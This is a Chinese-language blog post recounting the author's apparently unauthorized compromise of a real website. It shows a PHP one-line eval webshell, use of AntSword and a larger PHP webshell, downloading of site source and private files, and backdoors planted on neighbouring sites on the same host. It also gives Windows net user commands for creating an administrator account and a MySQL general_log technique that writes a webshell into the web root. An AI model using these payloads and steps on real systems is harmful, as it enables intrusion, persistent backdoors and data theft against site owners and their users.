一次PHP大马提权

记一次PHP提权

发现

PHP大马：指木马病毒；PHP大马，就是PHP写的提取站点权限的程序；因为带有提权或者修改站点功能，所以称为叫木马。

自从师哥那里听说过之后，一直感叹于PHP大马的神奇...但一直没有机会。

直到有一天，某同学发来一个学习网站，随便翻了翻感觉嘿嘿嘿！还行......

试着上传一句话木马

<?php @eval($_POST['a']);?>

呃，显示上传成功...那就上蚁剑，直接连吧。

结果成了，这比我之前想的简单这么多吗？？？

既然到这儿了，为什么不试一下PHP大马呢？

来吧！

准备一枚PHP大马，通过蚁剑上传。

（PHP大马代码太多了，在网站直接上传的话，不容易成功）



输入密码，进入一看，我直接好家伙！毕竟是第一次去用它嘛。



网站源码都在里面了，还有网站后门。。。

发现了一个文件夹，点进去，发现了按日期排序的某些不可言明的学习资料。。。直接下载！

那为什么大马能实现这些功能呢？

通过socket或curl远程读取服务器phpapi.info上的大马数据，有意思的一点是把大马数据保存在session中，而不是写到文件中，所以要根据代码查杀是不行的。只要服务器不清除session中的数据，大马就会一直存在。

其他东西

去到上级目录，旁站的数据也看到了。。。还有赌博站、发卡站等，看了看有七八个站。

那网站源码我就存下了，学习资料也顺手留下啦！

顺便在旁站留下后门，别问，问就是为了好好学习！

我们可以新建管理用户、查看PHP版本

(这个站的PHP版本应该是7.1.33的)

还可以MYSQL提权！这我真没想到（这枚大马是师哥送我的，我也是第一次去使用它）

有了MySQL提权，我们可以试着利用日志写入webshell。直接提权的话也可以试试（反正我没试过）。

PHP大马提权过程简写

WINDOWS常见命令：

net user 查看所有用户

query user 查看当前运行中的用户

net user 用户名 密码 修改用户密码

net user 用户名 密码 /add 添加用户

net user 用户名 密码 /active 激活用户

net localgroup administrators 用户名 /add 添加管理员组

1.利用蚁剑上传cmd.exe

2.执行后，先查看所有用户，然后新建用户并将其填到管理员用户组下，用户名密码随便设置一个就好。

3.在WINDOWS10自带搜索框搜素mstsc呼出，点击远程桌面连接，输入ip即可连接服务器

MYSQL提权

MYSQL提权作用很大，我是从别处学到的，学艺不精，不敢妄语。

利用log日志写入WebShell

log日志可以保存所有的查询日志，先执行如下代码看一看基本配置：

 show variables like '%general%';

当 general_log=ON 时，所查询的sql语句都会出现在log文件中。那么，如果把 general_log_file 的路径修改为 shell.php，那么所查询的sql语句就会保存在shell.php中，如果我们执行查询一个一句话，就可以getshell。

set global general_log_file = '/var/www/html/shell.php';    # 设置日志文件地址

select '<?php eval($_POST[abc]);?>';   # 查询一句话,此时日志文件shell.php中将写入webshell

set global general_log=OFF;            #关闭

如果general_log=OFF的话我们还得需要设置为ON模式，再执行上面的sql语句。

set global general_log = ON;

小小看法

PHP大马和蚁剑哪个好用？我个人认为蚁剑好一些，PHP大马的功能，很多都可以利用蚁剑实现（而且我习惯用蚁剑了）。但其实也无所谓。

具体的PHP大马分析在写，有机会的话会写一个具体的PHP大马分析，并给出我的PHP大马。